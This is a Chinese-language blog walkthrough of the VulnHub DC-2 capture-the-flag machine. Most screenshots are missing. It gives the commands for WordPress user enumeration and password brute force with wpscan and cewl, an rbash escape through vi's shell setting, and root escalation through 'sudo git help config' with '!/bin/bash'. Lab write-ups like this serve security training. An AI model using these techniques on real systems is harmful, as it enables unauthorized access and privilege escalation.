【VulnHub DC-2】rbash逃逸、Git提权

名称:DC-2
发布日期:2019 年 3 月 22 日
难度:初级
下载链接:https://www.vulnhub.com/entry/dc-2,311/

信息收集

主机发现

image

端口扫描

image

访问web(添加hosts文件)

image

image

目录扫描

image

目标站点使用word press搭建

image

漏洞利用

使用wpscan进行扫描,发现admin、tom、jerry三个用户

wpscan --url http://dc-2 -eu

image

通过cewl工具,对页面字段进行收集,便与进行下一步攻击。

image

通过wpscan工具进行用户名和密码的暴力破解

image

Flag1

登录后台,使用jreey用户

image

Flag2

image

使用SSH登录

发现存在rbash

image

参考:https://cloud.tencent.com/developer/article/1680551
使用vi进行绕过rbash

vi test  #打开vi编辑器
set shell=/bin/bash  #在vi末行模式中输入
set shell   #在vi末行模式中输入

rbash逃逸成功

image

添加环境变量

export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

image

Flag3

使用vi查看flag3.txt文件

image

切换至jerry用户

image

Flag4

image

Git提权

sudo -l 查看root权限命令,发现可以使用git进行提权

sudo git help config
	!/bin/bash或者!'sh'完成提权

image

Flag5

image

总结

1、rbash逃逸
2、git提权

posted @ 2022-07-16 15:35  StarCi  阅读(268)  评论(0编辑  收藏  举报